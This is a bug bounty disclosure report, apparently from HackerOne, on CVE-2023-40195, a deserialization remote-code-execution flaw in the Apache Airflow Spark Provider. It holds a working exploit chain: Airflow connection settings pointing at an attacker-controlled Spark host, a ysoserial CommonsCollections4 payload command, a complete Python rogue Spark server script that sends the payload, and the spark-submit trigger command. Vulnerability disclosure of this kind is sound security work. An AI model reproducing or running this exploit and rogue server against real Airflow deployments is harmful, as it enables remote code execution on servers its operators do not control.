Lucene search

K
hackeroneHappyhacking123H1:2127968
HistoryAug 29, 2023 - 5:31 p.m.

Internet Bug Bounty: CVE-2023-40195: Apache Airflow Spark Provider Deserialization Vulnerability RCE

2023-08-2917:31:46
happyhacking123
hackerone.com
52
apache
airflow
spark
deserialization
vulnerability
rce
rpc
exploitation
attack
malicious
server
configuration
pyspark
ui
connection
ysoserial
tool
command
client
dags
hive
task
trigger
master
worker
commonscollections4
exp

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

45.7%

Apache Airflow Spark Provider. After the malicious Spark server address is configured through the connections of the Airflow UI interface, attackers exploit malicious servers to manipulate pyspark clients through malicious deserialization data. So as to implement RCE attack on airflow server.

##Vulnerability principle:

  1. Analyze spark principle: Spark protocol is based on RPC communication. The RPC communication process is a serialization and deserialization process, Therefore, attackers can call arbitrary java methods through deserialization, implement RCE.

2.Spark can attack the server through malicious client deserialization, and can also attack the client through malicious server; In the Airflow scenario, PySpark is used as a client to connect to the Spark Server through Spark Provider. So, an attacker only needs to construct a malicious server to attack Airflow’s Spark client.

The command that triggers deserialization is as follows:
spark-submit --master spark://evil_ip:port
Therefore, an attacker can configure malicious ip and port through the connections of the Airflow UI. And to execute the above command, then trigger the deserialization operation.

##Vulnerability exploitation process:

  1. Create a new ‘Spark’ connection is named ‘spark_default’,and configure the Port and Host parameter.
    Host: spark://172.31.76.174
    Port: 8888

###172.31.76.174 is malicious spark server address for attackers

(F2648714)

{F2648715}

2.Attackers generate malicious deserialized data (exp.der) through the deserialization tool ysoserial.
Tool URL: https://github.com/frohoff/ysoserial**The attacker locally executes the following commands:“C:\Program Files\Java\jre1.8.0_361\bin\java” -jar ysoserial.jar CommonsCollections4 “touch /tmp/thisisRCE” > exp.der**
#touch /tmp/thisisRCE is malicious commands to be executed on airflow.

{F2648716}

3.The attacker starts the malicious Spark server locally and specifies the malicious deserialized data to be transmitted.
python2 evil_spark_server.py 8888 exp.der

{F2648717}

  1. Enter the DAGs menu and start hive_dag task, select “Trigger DAG w/ config”.
    http://localhost:8080/trigger?dag_id=example_spark_operator

{F2648718}

  1. The final command is as follows:

spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file
Through the log and server view, it can be seen that any command has been executed successfully.

{F2648719}

The malicious server successfully accepted the request and sent malicious data.

{F2648720}

Successfully executed malicious commands on Airflow Worker Server.

{F2648722}

evil_spark_server.py

#!/usr/bin/python
import socket
import os
import sys
import struct

from SocketServer import BaseRequestHandler, ThreadingTCPServer

class EchoHandler(BaseRequestHandler):
    def handle(self):
        print 'Got connection from %s'%(str(self.client_address))
        while True:
            msg = self.request.recv(8192)
            print msg
            if not msg:
                break
            if len(msg) > 16:
                print "Send msg>>>"
                self.request.send(build_msg(msg[9:17]))

def build_msg(request_id):
    payloadObj = open(sys.argv[2],'rb').read()
    msg_type = '\x04'
    head_length = 21
    msg = struct.pack('>Q',len(payloadObj) + 21) + msg_type + request_id
    msg += struct.pack('>I',len(payloadObj)) + payloadObj
    return msg
if __name__ == '__main__':
    if len(sys.argv) < 3:
        print 'Usage: python %s <port> </path/to/payload>' % os.path.basename(sys.argv[0])
        sys.exit()
    serv = ThreadingTCPServer(('0.0.0.0', int(sys.argv[1])), EchoHandler)
    print "Server listening on 0.0.0.0:%s"%(sys.argv[1])
    serv.serve_forever()

DAG Demo(example_spark.py):

from datetime import datetime

from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator
from airflow.providers.apache.spark.operators.spark_sql import SparkSqlOperator
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator

with DAG(
    dag_id='example_spark_operator',
    schedule_interval=None,
    start_date=datetime(2021, 1, 1),
    catchup=False,
    tags=['example'],
) as dag:
    # [START howto_operator_spark_submit]
    submit_job = SparkSubmitOperator(
        application="/tmp/file", task_id="submit_job"
    )
    # [END howto_operator_spark_submit]

    # [START howto_operator_spark_jdbc]
    jdbc_to_spark_job = SparkJDBCOperator(
        cmd_type='jdbc_to_spark',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="overwrite",
        save_format="JSON",
        task_id="jdbc_to_spark_job",
    )

    spark_to_jdbc_job = SparkJDBCOperator(
        cmd_type='spark_to_jdbc',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="append",
        task_id="spark_to_jdbc_job",
    )
    # [END howto_operator_spark_jdbc]

    # [START howto_operator_spark_sql]
    sql_job = SparkSqlOperator(sql="SELECT * FROM bar", master="local", task_id="sql_job")
    # [END howto_operator_spark_sql]

Impact

RCE

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

45.7%